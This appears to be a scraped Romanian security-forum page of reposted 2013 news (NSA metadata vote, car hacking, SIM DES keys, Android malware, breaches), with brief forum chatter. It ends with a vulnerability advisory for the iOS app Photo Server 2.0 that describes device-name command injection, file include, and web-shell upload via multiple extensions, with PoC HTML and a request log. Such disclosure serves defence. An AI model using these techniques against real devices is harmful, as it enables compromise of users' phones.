Matt

Are raportul 2/4.Varianta corecta fiind B,50 % . 2 variante sunt identice.

Dupa cum au zis si restul s-ar putea sa fie 50 % pentru ca daca ai ales a si nu este de aici deduci ca este altul. Deci ori e a ori e b . Ori e a ori e c. Ori e a ori e d. Ori e a ori e ba. Deci 50 %.

Dar a si d sunt aceleasi variante 25 %. Aici trebuie sa fie "cursa"

Cred ca 25 % . Sper sa nu fac vreo gafa. Daca alegi 1 din 4 ai sanse de 25 % E o varianta din 4 * 100 !? Sau poate aberez //Pare prea usor, e o capcana pe undeva..

BASS ORCHESTRATOR Skrillex is offering his fans just a blank website thanks to a hacker group called Eboz that took it down for him. Skrillex makes the sort of music that teenagers play to annoy their parents, and makes anyone older than that generation say, "Well, it's just noise." We've linked one of his music tracks below. Make sure you move any china from the edge of any surfaces as you are about to experience a dubstep bassline. They are loud, rumbling and deep. According to the eHacking News website, the Turkish group Eboz was behind the attack, which was actually a defacement. We met Eboz at the end of last year when it took over a number of websites with Pakistani or .pk domain names. Then as now it replaced content on targeted websites with an image of some penguins. Some text accompanied the image, and it rea, "Always there for me in my homeboys friend" and "Have not shot me with every breath", according to the eHacking News translation. Skrillex does not seem too bothered about the attention. In a message he laughed off the downtime, saying, "Damn somebody hacked/jacked skrillex.com haha" and "Stuff like this happens quite often". A poster on Skrillex's feed names Eboz as the hacker group, and offers a nicer translation of the text. "I am always with my bros," it said. "is there anybody not by my side in every breath?" Some commentators suggest that Skrillex should be pleased to have earned the attention of such a famous group. He acknowledged that it is "definitely memorable". Sursa TheInquirer

Rep. Justin Amash (R-Michigan) walks through a basement tunnel to the House of Representatives on Capitol Hill, for the vote on his amendment to a Pentagon spending bill that would cut funding to the National Security Agency’s massive phone surveillance program. Photo: J. Scott Applewhite/AP The House today narrowly defeated an amendment to a defense spending package that would have repealed authorization for the National Security Agency’s dragnet collection of phone-call metadata in the United States. The amendment to the roughly $600 billion Department of Defense Appropriations Act of 2014 would have ended authority for the once-secret spy program the White House insists is necessary to protect national security. The amendment (.pdf), one of dozens considered, was proposed by Rep. Justin Amash (R-Michigan). “The government collects the phone records without suspicion of every single American of the United States,” he said during heated debate on the measure. Rep. Mike Rogers (R-Michigan), in urging a no vote, said “Passing this amendment takes us back to September 10.” The vote was 205-217. Here is the vote count. The Obama administration lobbied hard to stop the amendment’s passage. White House spokesman Jay Carney said ahead of the vote: “This blunt approach is not the product of an informed, open, or deliberative process. We urge the House to reject the Amash amendment, and instead move forward with an approach that appropriately takes into account the need for a reasoned review of what tools can best secure the nation.” Carney did not mention that the massive surveillance program was itself not the product of an informed, open or deliberative process, but rather the product of secret court rulings and classified government memos, which came to light only through leaks by NSA whistleblower Edward Snowden. NSA chief Gen. Keith Alexander and James Clapper, the director of national intelligence, also lobbied lawmakers, urging them to vote no. The amendment was in response to a disclosure last month by the Guardian. The newspaper posted a leaked copy of a top secret Foreign Intelligence Surveillance Court opinion requiring Verizon Business to provide the National Security Agency the phone numbers of both parties involved in all calls, the International Mobile Subscriber Identity (IMSI) number for mobile callers, calling card numbers used in the call, and the time and duration of the calls. The government confirmed the authenticity of the leak and last week suggested many more, or “certain telecommunication service providers” are required to fork over the same type of metadata. The government says it needs all the data to sift out needles in a haystack. “This takes a leaf blower and blows away the entire haystack,” said Rep. Tom Cotton (R-Arkansas) in urging against the vote. The law that has been authorizing the surveillance is the Patriot Act — adopted six weeks after the 2001 terror attacks. The amendment substantially alters one of the most controversial provisions of the Patriot Act — Section 215 — that allows the secret Foreign Intelligence Surveillance Court to authorize broad warrants for most any type of “tangible” records, including those held by banks, doctors and phone companies. Lawmakers have repeatedly voted to prevent the act from expiring or against altering its language. Under the Patriot Act, the government only needs to show that the information is “relevant” to an authorized investigation. No connection to a terrorist or spy is required. The amendment would effectively gut the dragnet phone-metadata program that commenced following the 2001 terror attacks by only authorizing the metadata snooping against specified targets that are “the subject of an investigation.” The vote came days after Obama administration told a federal judge overseeing a lawsuit about the program that the wholesale vacuuming up of all phone-call metadata in the United States is in the “public interest,” does not breach the constitutional rights of Americans, and cannot be challenged in a court of law because no individual Americans have legal standing to sue. Sursa Wired.Com

Stomping on the brakes of a 3,500-pound Ford Escape that refuses to stop–or even slow down–produces a unique feeling of anxiety. In this case it also produces a deep groaning sound, like an angry water buffalo bellowing somewhere under the SUV’s chassis. The more I pound the pedal, the louder the groan gets–along with the delighted cackling of the two hackers sitting behind me in the backseat. Luckily, all of this is happening at less than 5mph. So the Escape merely plows into a stand of 6-foot-high weeds growing in the abandoned parking lot of a South Bend, Ind. strip mall that Charlie Miller and Chris Valasek have chosen as the testing grounds for the day’s experiments, a few of which are shown in the video below. (When Miller discovered the brake-disabling trick, he wasn’t so lucky: The soccer-mom mobile barreled through his garage, crushing his lawn mower and inflicting $150 worth of damage to the rear wall.) “Okay, now your brakes work again,” Miller says, tapping on a beat-up MacBook connected by a cable to an inconspicuous data port near the parking brake. I reverse out of the weeds and warily bring the car to a stop. “When you lose faith that a car will do what you tell it to do,” he adds after we jump out of the SUV, “it really changes your whole view of how the thing works.” This fact, that a car is not a simple machine of glass and steel but a hackable network of computers, is what Miller and Valasek have spent the last year trying to demonstrate. Miller, a 40-year-old security engineer at Twitter, and Valasek, the 31-year-old director of security intelligence at the Seattle consultancy IOActive, received an $80,000-plus grant last fall from the mad-scientist research arm of the Pentagon known as the Defense Advanced Research Projects Agency to root out security vulnerabilities in automobiles. The duo plans to release their findings and the attack software they developed at the hacker conference Defcon in Las Vegas next month–the better, they say, to help other researchers find and fix the auto industry’s security problems before malicious hackers get under the hoods of unsuspecting drivers. The need for scrutiny is growing as cars are increasingly automated and connected to the Internet, and the problem goes well beyond Toyota and Ford. Practically every American carmaker now offers a cellular service or Wi-Fi network like General Motors’ OnStar, Toyota’s Safety Connect and Ford’s SYNC. Mobile-industry trade group the GSMA estimates revenue from wireless devices in cars at $2.5 billion today and projects that number will grow tenfold by 2025. Without better security it’s all potentially vulnerable, and automakers are remaining mum or downplaying the issue. As I drove their vehicles for more than an hour, Miller and Valasek showed that they’ve reverse-engineered enough of the software of the Escape and the Toyota Prius (both the 2010 model) to demonstrate a range of nasty surprises: everything from annoyances like uncontrollably blasting the horn to serious hazards like slamming on the Prius’ brakes at high speeds. They sent commands from their laptops that killed power steering, spoofed the GPS and made pathological liars out of speedometers and odometers. Finally they directed me out to a country road, where Valasek showed that he could violently jerk the Prius’ steering at any speed, threatening to send us into a cornfield or a head-on collision. “Imagine you’re driving down a highway at 80 ,” Valasek says. “You’re going into the car next to you or into oncoming traffic. That’s going to be bad times.” A Ford spokesman says the company takes hackers “very seriously,” but Toyota, for its part, says it isn’t impressed by Miller and Valasek’s stunts: Real carhacking, the company’s safety manager John Hanson argues, wouldn’t require physically jacking into the target car. “Our focus, and that of the entire auto industry, is to prevent hacking from a remote wireless device outside of the vehicle,” he writes in an e-mail, adding that Toyota engineers test its vehicles against wireless attacks. “We believe our systems are robust and secure.” But Miller and Valasek’s work assumed physical access to the cars’ computers for a reason: Gaining wireless access to a car’s network is old news. A team of researchers at the University of Washington and the University of California, San Diego, experimenting on a sedan from an unnamed company in 2010, found that they could wirelessly penetrate the same critical systems Miller and Valasek targeted using the car’s OnStar-like cellular connection, Bluetooth bugs, a rogue Android app that synched with the car’s network from the driver’s smartphone or even a malicious audio file on a CD in the car’s stereo system. “Academics have shown you can get remote code execution,” says Valasek, using hacker jargon for the ability to start running commands on a system. “We showed you can do a lot of crazy things once you’re inside.” One of the UCSD professors involved in those earlier tests, Stefan Savage, claims that wireless hacks remain possible and affect the entire industry: Given that attacks on driving systems have yet to be spotted outside of a lab, manufacturers simply haven’t fully secured their software, he says. “The vulnerabilities that we found were the kind that existed on PCs in the early to mid-1990s, when computers were first getting on the Internet,” says Savage. As cars approach Google’s dream of passenger-carrying robots, more of their capabilities also become potentially hackable. Miller and Valasek exploited Toyota’s and Ford’s self-parking functions, for instance, to hijack their vehicles’ steering. A car like the 2014 Mercedes Benz S-Class, which can negotiate stop-and-go traffic or follow a leader without input, may offer a hacker even more points of attack, says Gartner Group analyst Thilo Koslowski. “The less the driver is involved, the more potential for failure when bad people are tampering with it,” he says. In the meantime, Miller and Valasek argue that the best way to pressure car companies to secure their products is to show exactly what can be done with a multi-ton missile on wheels. Better to experience the panic of a digitally hijacked SUV now than when a more malicious attacker is in control. “If the only thing keeping you from crashing your car is that no one is talking about this,” says Miller, “then you’re not safe anyway.” Sursa Forbes.Com

Contul bancar ar fi ok.

S-au mai postat dar in trecut.

Pai astea pot intra direct in categoria aceea RST Market fara sa mai fie divizata.

Problemele grave de securitate care afecteaza milioane de cartele SIM ar trebui sa poata fi usor remediate de catre operatori, potrivit cercetatorului de securitate german care a identificat aceste probleme. Karsten Nohl, din cadrul Security Research Labs a expus la inceputul acestei saptamani un rezumat al unei cercetari efectuate, potrivit careia milioane de cartele SIM folosesc, probabil, un sistem de criptare invechit, din anii 1970, pentru a autentifica actualizarile software over-the-air (OTA). Nohl a constatat ca este usor de pacalit anumite tipuri de cartele SIM, pentru a divulga cheia de criptare 56-bit DES (Data Encryption Standard), care poate fi decriptata utilizand un computer obisnuit. Nohl a descoperit ca, prin transmiterea unei actualizari false OTA pe telefoane, unele dintre cartelele SIM au trimis inapoi un cod de eroare, continand aceasta cheie. Apoi, pe dispozitiv poate fi trimis spyware care sa acceseze datele critice ale telefonului prin intermediul Java Virtual Machine al cartelei, un cadru software prezent pe aproape fiecare dintre cartelele SIM vandute in intreaga lume. Nohl a explicat intr-un interviu ca 500 milioane de telefoane, indiferent de marca, ar putea fi vulnerabile.Insa problema criptarii slabe si returnarea codului de eroare cu o cheie slaba se pot remedia prin aceeasi modalitate prin care pot fi exploatate: prin intermediul unei actualizari OTA. Cartelele SIM vin intr-o mare varietate de configuratii. Operatorii vor transmite operatorilor specificatii pentru cartelele SIM, care sa fie utilizate pe retelele lor. Multe cartele SIM contin vechi configuratii si o tehnologie invechita, cum ar fi DES, care dateaza de mai mult de un deceniu, a explicat Nohl. Pentru unele cartele SIM s-ar putea opri criptarea DES si activa Triple DES, o forma mai sigura de criptare care este utilizata in prezent. Utilizatorii nici macar nu vor sti ca telefoanele lor sunt actualizate, avand in vedere faptul ca operatorii trimit frecvent actualizari, folosind coduri speciale SMS pentru a modifica, spre exemplu, setarile roaming, a precizat Nohl. O actualizare OTA poate, astfel, sa conduca la rezolvarea problemei telefoanelor care returneaza mesajul de eroare. Operatorii pot, de asemenea, sa creeze o cheie de ajustare pentru centrele lor SMS, care proceseaza toate mesajele SMS. Din moment ce atat de multi operatori sunt afectati, Nohl a declarat ca laboratorul sau a contactat grupul GSM Association, transmitandu-i detalii cu privire la cercetare. Nohl va oferi o prezentar completa a cercetarii efectuate, la data de 31 iulie, in cadrul conferintei de securitate Black Hat. Sursa : Computerworld - IT news, features, blogs, tech reviews, career advice

Amenintarile informatice care vizeaza furtul datelor personale si al detaliilor de autentificare in conturile bancare castiga din ce in ce mai mult teren in peisajul virusilor pentru terminale mobile cu Android. Daca virusii care trimit SMS-uri la numere premium sunt in continuare in top din punct de vedere al numarului de atacuri, noile amenintari, mai complexe, de tip ransomware – ce blocheaza terminalul si solicita plata unei amenzi – si virusii bancari inregistreaza cresteri sustinute. Virusii bancari de Android pretind a fi actualizari ale certificatelor digitale si pacalesc astfel utilizatorii sa ii descarce si sa ii instaleze. Daca Zeus este vedeta virusilor bancari pentru PC-uri, ZitMo este corespondentul acestuia pe Android si este la fel de periculos. Acesta primeste comenzi de la un server de comanda si control catre care poate trimite toate SMS-urile pe care le primeste utilizatorul pe mobil. In acest fel, hackerii pot intercepta numarul de autentificare al tranzactiilor (mTAN) imediat ce utilizatorii le initiaza. Actionand prin intermediul unui PC infectat cu Zeus si al unui terminal mobil de pe care ZitMo intercepteaza SMS-urile, atacatorii castiga controlul complet asupra tranzactiilor bancare online ale unei persoane. Cele mai multe raportari ale lui ZitMo, in primul semestru al acestui an, vin din China si mai bine de 5% dintre detectii din Romania. Distributia globala ZitMo 1. China - 44.65% 2. Germania - 14.47% 3. Romania - 5.66% 4. Statele Unite - 5.03% 5. India - 5.03% 6. Altele - 25.16% Un nou tip de malware de Android, detectat in Asia, are acelasi comportament precum virusii de PC de tip ransomware. Deghizat in solutie antivirus, acest tip de virus pacaleste utilizatorii sa il descarce, blocheaza terminalul si apoi solicita bani pentru a-l debloca. Familia de virusi Android.FakeAV se regaseste mai frecvent in tarile unde utilizatorii descarca aplicatii din magazine neoficiale, fiind tentati cu promisiunea unei solutii antivirus eficiente. Distributia globala a familiei FakeAV 1. India - 32.70% 2. Indonezia - 15.90% 3. Malaiezia - 6.96% 4. Thailanda - 4.68% 5. Myanmar - 4.41% 6. Filipine - 2.03% 7. Pakistan - 1.95% 8. Siria - 1.94% 9. Romania - 1.85% 10. Sudan - 1.66% 11. Altele - 25.92% Reclamele agresive afisate utilizatorilor de aplicatii gratuite sunt cunoscute pentru faptul ca aduna date personale pentru a adapta continutul in functie de utilizator. Agentiile de marketing apreciaza drept foarte valoros acest tip de informatie care face campaniile promotionale mai eficiente si mai profitabile. Familii de Adware la nivel global 1. Android.Adware.Plankton - 53.34% 2. Android.Adware.Mulad - 13.09% 3. Android.Adware.Kuguo - 12.12% 4. Android.Adware.Wapsx - 11.91% 5. Android.Adware.Adwo - 8.82% 6. Altele - 0.72% "In concluzie, pe fondul unei slabe reglementari a folosirii terminalelor personale la birou si a accesului acestora la datele companiei, atacatorii ar putea exploata vulnerabilitatile de Android si nestiinta angajatilor pentru a obtine accesul la sistemele companiei. Astfel, solutiile de securitate pentru Android nu mai sunt optionale, ci obligatorii in contextul acestor noi tipuri de atacuri’’, a declarat Catalin Cosoi, Chief Security Strategist, Bitdefender. Pentru protectia terminalelor mobile cu Android, Bitdefender recomanda folosirea solutiei complete de securitate Bitdefender Mobile Security. Sursa Smartnews.ro

UK homeware retailer Lakeland is asking its customers to change their passwords as a precaution following a hack attack that allowed cybercrooks to reach two of its encrypted databases. Lakeland sent an email to customers late on Tuesday admitting the breach, and informing them that it was resetting passwords. Users will be obliged to create a new password the next time they log in or try to shop with the retailer. The breach, which Lakeland detected last Friday (19 July), involved two encrypted databases. In a statement on its website, Lakeland admits it doesn't yet know if any data was actually stolen, though it's fair to point out that it's only days into a breach investigation and any computer forensics work takes time to do properly. Lakeland apologised to its customers for any inconvenience caused by the security flap, which only affects its online punters and not its store or mail order clients. Its statement goes on to blame the hack on a sophisticated assault against a "recently identified flaw" in an unspecified system. As things stand, Lakeland customers can be forgiven for being unsure whether their personal and financial data has been compromised. Lakeland's statement omits common reassurances that payment systems were unaffected, although it offered some reassurance in an update to its official Twitter account stating "we have no evidence that any card data has been compromised" it hasn't said whether or not the encrypted databases that got hit contained payment information. Dodi Glenn, director of security content management at ThreatTrack Security, commented: “It is common practice to purge passwords in the event someone suspects a compromise of their database. While customers may be alarmed as is natural in these circumstances, Lakeland should work with the authorities to identify what information was leaked. Customers should have the right to know if their credit card numbers were stolen. Lakeland and others should take note that being proactive instead of reactive is the best approach, because brand reputation is priceless.” Sursa TheRegister.co.uk

Google's revamped Nexus 7 fondleslab is the first device to ship with Android 4.3, but other devices will be receiving the update over the air soon and owners of Google's flagship Nexus kit can already download system images. The new OS release is an incremental update to the Android 4.x line and it retains the "Jelly Bean" code name of the last two major releases. From the user's perspective, the most prominent new feature is support for restricted profiles, which allow the device owner to limit which apps specific user accounts are allowed to launch. Software developers can also have their apps advertise specific content or capabilities that can then be controlled via restricted profiles. Notifications have been upgraded so that apps can now observe the stream of notifications and present them in new ways, including sending them to a different device connected over Bluetooth. Device performance and responsiveness has also been improved in Android 4.3, including enhancements to hardware accelerated graphics rendering and reduced touch latency. Fonts and shapes now render more clearly, and the 2D graphics renderer can now scale across multiple CPU cores for some tasks. Further enhancing graphics performance, the new release introduces support for OpenGL ES 3.0, the latest version of the cross-platform mobile graphics standard, which includes an updated shading and texture-rendering engine with native support for high quality texture compression. The catch, though, is that it does require support from the underlying graphics hardware. Support is already in place for the Nexus 4, Nexus 10, and the new Nexus 7, with other devices to come later. Similarly, Android 4.3 introduces support for Bluetooth Smart Ready – aka the Low Energy portion of the Bluetooth 4.0 spec – but only on supported devices, which so far include the Nexus 4 and the new Nexus 7 only. The update also adds support for Bluetooth AVRCP 1.3, which enables more advanced control of remote media players from Android devices. A new, modular DRM framework makes it easier to add content controls to media apps, while new VP8 encoding and media-muxing capabilities offer new options for authoring media on Android devices. Android 4.3 also brings a variety of minor enhancements and new features, including improved app security via the SELinux framework, enhancements to localization and right-to-left language processing, improved logging and profiling tools for developers, accessibility improvements, and more. You can check out a detailed list in the update's official release notes. Who will get it and when? As for when you'll be able to get your hands on Android 4.3, that's hard to say. Google says it started rolling out the update for Nexus 4, Nexus 7 (old and new), Nexus 10, and HSPA+ Galaxy Nexus devices on Wednesday, but in practice it can take up to a month for over-the-air updates to reach every device. Die-hards who just can't wait also have the option of downloading factory firmware images direct from Google's developer site. The Chocolate Factory made images available on Wednesday for every device that's getting the over-the-air update. Note, however, that using these images means wiping your device. You'll also need an unlocked bootloader and a modicum of hacker-savvy, so this approach won't be for everyone. When devices not on Google's initial update list will get Android 4.3 is even less clear. As in the past, the CDMA version of the Galaxy Nexus from Verizon is not getting the update in this first round, and if previous Jelly Bean updates are any indication, it may be some time before it does. Timing for other phones will depend on handset makers and mobile carriers, but Google reps did mention at the launch event that an Android 4.3 update for the Samsung Galaxy S 4 would be "coming soon." ® Sursa TheRegister.co.uk

Edward Snowden's PRISM revelations will soon impact the balance sheets of US cloud vendors, according to the Cloud Security Alliance. The group claims the latest survey (PDF) of its 500 members suggests the NSA leaks would make more than half non-US the respondents think twice about hosting their data with American-based providers, and more than 90 percent believe companies should be able to publish transparency-style reports about Patriot Act requests for customer data. The Patriot Act has frequently emerged as a significant concern among non-US corporations. For example during 2012, Rackspace and Australian provider Macquarie Telecom sniped at each other over such risks. Rackspace had described statements that data stored in the US becomes subject to American snooping as “mischievous”. Sanguinity about the Patriot Act is no longer in vogue, however: 86 per cent of respondents worldwide believe that bit of legislation should either be abandoned entirely, or should be altered to provide better transparency about, and oversight of, its operations. However, American respondents to the survey don't believe the data sovereignty issue is going to dent their business, with 64 percent of those saying the Snowden affair isn't making it harder to conduct business offshore. ® Sursa TheRegister.co.uk

Virus-hunter Symantec says the Android master key vulnerability is being exploited in China, where half-a-dozen apps have showed up with malicious content hiding behind a supposedly-safe crypto key. The simple, straightforward and utterly stupid vulnerability arises because, as Bluebox Security demonstrated recently, someone with evil intent and hardly any expertise can pack an Android APK package (a Zip file under another extension) with files carrying the same name as those in the archive. As noted by El Reg here, Android's crypto system verifies the first version of any repeated file in an APK – but the installer picks up the large version. On 22 July, BitDefender identified a number of apps popping up on the Google Play store. Now, Symantec has joined the party, identifying apps in China that have been exploited with the vulnerability to plant malicious code. There's two apps designed for doctor-finding, a news app, an arcade game, and a betting/lottery app. The good news for Androiders outside the Great Firewall is that all the malicious apps were being distributed on Chinese Android marketplaces rather than Google Play. Symantec's post states that the same attacker embedded code in all the compromised apps. The aim of the attack is to remotely control devices, steal data such as IMEI and phone numbers, send premium SMS messages, and on rooted devices, disable some Chinese mobile security apps. ® Sursa TheRegister.co.uk

Facebook-for-bosses website LinkedIn has fixed a security vulnerability that potentially allowed anyone to swipe users' OAuth login tokens. The flaw came to light after British software developer Richard Mitchell discovered part of the LinkedIn's customer help website handed out the private OAuth token of the logged-in user. These otherwise secret tokens can be used by anyone to masquerade as LinkedIn users linked to those tokens, and potentially access profile information using APIs. Before handing over the sensitive data, JavaScript code on the help site merely checked that the previously visited page was served from LinkedIn.com - a trivial HTTP referrer check that can be easily circumvented. Thus, someone could log into LinkedIn and surf to a malicious web page with code embedded to poke the help site for the victim's OAuth token. "I quickly found a request to a JavaScript file including the API key for the help system which immediately returned an OAuth token for the user," Mitchell explained in a blog post. "You shouldn’t trust JavaScript or the referrer header exclusively for any kind of authorisation policy." Losing control of an OAuth token is a great deal less serious than compromised login credentials, but it's still bad news. Fortunately the LinkedIn flaw was identified and responsibly disclosed before any harm came of the bug. Mitchell privately reported the flaw on 3 July. The social network was able to fix the hole within a couple of days, and sent Mitchell a t-shirt as a small thank you for his efforts. The fix involved disabling requests without HTTP referrers, according to Mitchell. A LinkedIn spokesman confirmed to El Reg that Mitchell's account of the bug find was accurate. "We can confirm that we were notified of the OAuth vulnerability and took immediate action to fix the issue, which was resolved by our team within 48 hours of being notified," he said. ® Sursa TheRegister.co.uk

IBM has launched new real-time security management tools, including its QRadar Vulnerability Manager (QVM), which it said combs through potential security flaws and presents them to security officers in a more manageable format. QVM lists results from multiple security scanners alongside the latest X-Force Threat Intelligence reports and listings from the National Vulnerability Database to allow users to quickly get a grasp on which potential problems present the highest risk. The software also includes an embedded, PCI-certified scanner, which can be scheduled to run periodically or triggered based on network events. Brendan Hannigan, general manager at IBM Security Systems said the firm's new product launch was a timely one. "Traditional vulnerability management solutions are fundamentally broken," he explained. "Vulnerability scanning today lacks network-wide visibility, contextual awareness and real-time scanning. These gaps mean even well-known and preventable vulnerabilities can be lost in an overload of data, leaving organisations exposed to high risks." Murray Benadie, managing director of IBM partner Zenith Systems said he believed the new software was significant. "It can cut a huge list of vulnerabilities in half, if not more," he said. "Users will quickly see vulnerabilities on their networks, without trying to mash products together – that is how information falls through the cracks." In addition, the firm announced that it would be enhancing its intrusion prevention platforms with the introduction of IBM Security Network Protection XGS 5100, which includes better detection of SSL-based attacks. The update also allows security officers to issue a "virtual patch"; technology which provides protection from ongoing unpatched security flaws. On Friday, IBM revealed its Q2 2013 financial results, with profits seeing a drop but its mainframe and software departments experiencing growth. Sursa V3.co.uk

Atunci felicitari.Toata lumea la inceput pleaca de la un IP Tools.

Codul e scris de tine?

Description : Photo Server version 2.0 suffers from remote shell upload and command injection vulnerabilities. Author : Benjamin Kunz Mejri Source : Photo Server 2.0 Shell Upload / Command Injection ? Packet Storm Code : Title: ====== Photo Server 2.0 iOS - Multiple Critical Vulnerabilities Date: ===== 2013-07-23 References: =========== http://www.vulnerability-lab.com/get_content.php?id=1029 VL-ID: ===== 1029 Common Vulnerability Scoring System: ==================================== 8.6 Introduction: ============= Photo Server is the free (photos only) version of Video Server. Access your device`s camera roll from any computer or device with a web browser on your local network router`s WiFi. With proper configuration of your WiFi router, access can be made from the web browser of any computer or device connected to the internet. Video transfer can be enabled either through the in-app upgrade or by clicking on and viewing an iAd (iAds not available in all countries yet). The Bluetooth option allows you to transfer photos stored in your camera roll between Apple iMobile devices such as the iPhone, iPod Touch, and iPad without WiFi. Once the BlueTooth connection is established between the devices, choose your picture and the app automatically begins transmitting it via BlueTooth to the other device. Once received on the other device you can view the photograph and save it to your camera roll. (Copy of the Homepage: https://itunes.apple.com/en/app/photo-server/id397545365 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered a command injection and file include (arbitrary file upload) vulnerability in the Photo Server 2.0 application (Apple iOS - iPad & iPhone). Report-Timeline: ================ 2013-07-23: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Apple AppStore Product: Photo Server - Application 2.0 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== 1.1 A local command/path injection web vulnerability is detected in the Photo Server 2.0 application (Apple iOS - iPad & iPhone). The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application. The vulnerability is located in the index file dir listing module when processing to request and list the ipad or iphone devicename. Local attackers can change the name of the device to inject the code and request any local path or inject commands on application-side. The malicious context with the path request executes when a user or victim is watching the file dir index listing. Exploitation of the web vulnerability requires a local privilege iOS device account with restricted access and no user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific commands and path requests. Vulnerable Application(s): [+] Photo Server v2.0 - ITunes or AppStore (Apple) Vulnerable Parameter(s): [+] device name Affected Module(s): [+] Index File Dir Listing 1.2 A file include web vulnerability is detected in the Photo Server 2.0 application (Apple iOS - iPad & iPhone). The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service. The vulnerability is located in the upload module when processing to upload files with manipulated names via POST method. The attacker can inject local path or files to request context and compromise the device. The validation has a bad side effect which impacts the risk to combine the attack with persistent injected script code. Exploitation of the file include web vulnerability requires no user interaction or privilege application user account. Successful exploitation of the vulnerability results in unauthorized local file and path requests to compromise the device or application. Vulnerable Module(s): [+] Upload (Files) Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing 1.3 An arbitrary file upload web vulnerability is detected in the Photo Server 2.0 application (Apple iOS - iPad & iPhone). The arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation for unauthorized access. The vulnerability is located in the upload module when processing to upload files with multiple ending extensions. Attackers are able to upload a php or js web-shells by renaming the file with multiple extensions. He uploads for example a web-shell with the following name and extension image.jpg.js.php.jpg . He deletes in the request after the upload the jpg to access unauthorized the malicious file (web-shell) to compromise the web-server or mobile device. Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account. Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells. Vulnerable Module(s): [+] Upload (Files) Vulnerable Parameter(s): [+] filename (multiple extensions) Affected Module(s): [+] Index File Dir Listing Proof of Concept: ================= 1.1 The local command/path inject web vulnerability can be exploited by local attackers with device access and without user interaction. For demonstration or reproduce ... PoC: <html><head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <title>iPad ¥337 360* >"<[COMMAND/PATH INJECT VULNERABILITY]> Photo Server app's Web Browser Interface Page</title></head><body> <center><h2>iPad ¥337 360* >"<[COMMAND/PATH INJECT VULNERABILITY]">'s Photo Server App Web Browser Interface Page</h2></center><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>Choose QuickTime (.MOV) or JPEG (.JPG or .jpeg) file to upload to iPad ¥337 360* >"<iframe src=a>: <input type="file" name="file" id="file" value="Choose file..." /></label><label><input type="submit" name="button" id="button" value="Upload" /></label></form><hr><p><i>Save videos or photos of the links below to hard drive by using context menu's (mouse right-click) Save Link As ... function.</i><hr><h1>The Video and Photo List</h1> <li><a href='assets-library---asset/asset.PNG?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22&ext=PNG'><img --- Request Session Log --- Status: 200[OK] GET http://192.168.2.104:8888/vulnerabilitylab Load Flags[LOAD_DOCUMENT_URI ] Content Size[3032] Mime Type[application/x-unknown-content-type] Request Headers: Host[192.168.2.104:8888] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer [http://192.168.2.104:8888/] Connection[keep-alive] Response Headers: Accept-Ranges[bytes] Content-Length[3032] Date[So., 21 Jul 2013 10:13:51 GMT] 1.2 The file include web vulnerability can be exploited by remote attackers without application user account and user interaction. For demonstration or reproduce ... PoC: <hr><h1>The Video and Photo List</h1> <li><a href="http://192.168.2.104:8888/assets-library---asset/../[File Include Vulnerability].PNG ?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22&ext=PNG"><img src="iPad%20%C3%82%C2%A5337%20360%20%20Photo%20Server%20app%27s%2 0Web%20Browser%20Interface%20Page_files/../[File Include Vulnerability].PNG">assets-library---asset/../[File Include Vulnerability].PNG ?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22.PNG</a> 1.3 The arbitrary file upload vulnerability can by remote attackers without application user account and user interaction. For demonstration or reproduce ... PoC: <hr><h1>The Video and Photo List</h1> <li><a href="http://192.168.2.104:8888/assets-library---asset/pentester23.PNG.jpg.html.php.js.gif.PNG ?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22&ext=PNG"><img src="iPad%20%C3%82%C2%A5337%20360%20%20Photo%20Server%20app%27s%2 0Web%20Browser%20Interface%20Page_files/pentester23.PNG.jpg.html.php.js.gif.PNG">assets-library---asset/pentester23.PNG.jpg.html.php.js.gif.PNG ?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22.PNG</a> Note: After the request of the upload you can attacker can open the localhost:8888 webserver again and access the folder by an include of the filename Solution: ========= 1.1 The command/path injection web vulnerability can be patched by a secure parse or encoding of the 2 index location with the device name. 1.2 The file include web vulnerability can be patched by a secure parse of the POST method request when processing to upload a manipulated file. Encode, filter or parse also the output listing in the index with the existing file names. 1.3 Disallow multiple extensions by secure filtering of the POST method request when processing to upload a file with multiple extensions. Change the web app http server settings and file access rights to prevent the execution of js, html and php files. Risk: ===== 1.1 The security risk of the command/path inject web vulnerability is estimated as high. 1.2 The security risk of the file include web vulnerability is estimated as critical. 1.3 The security risk of the arbitrary file upload vulnerability is estimated as high(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - 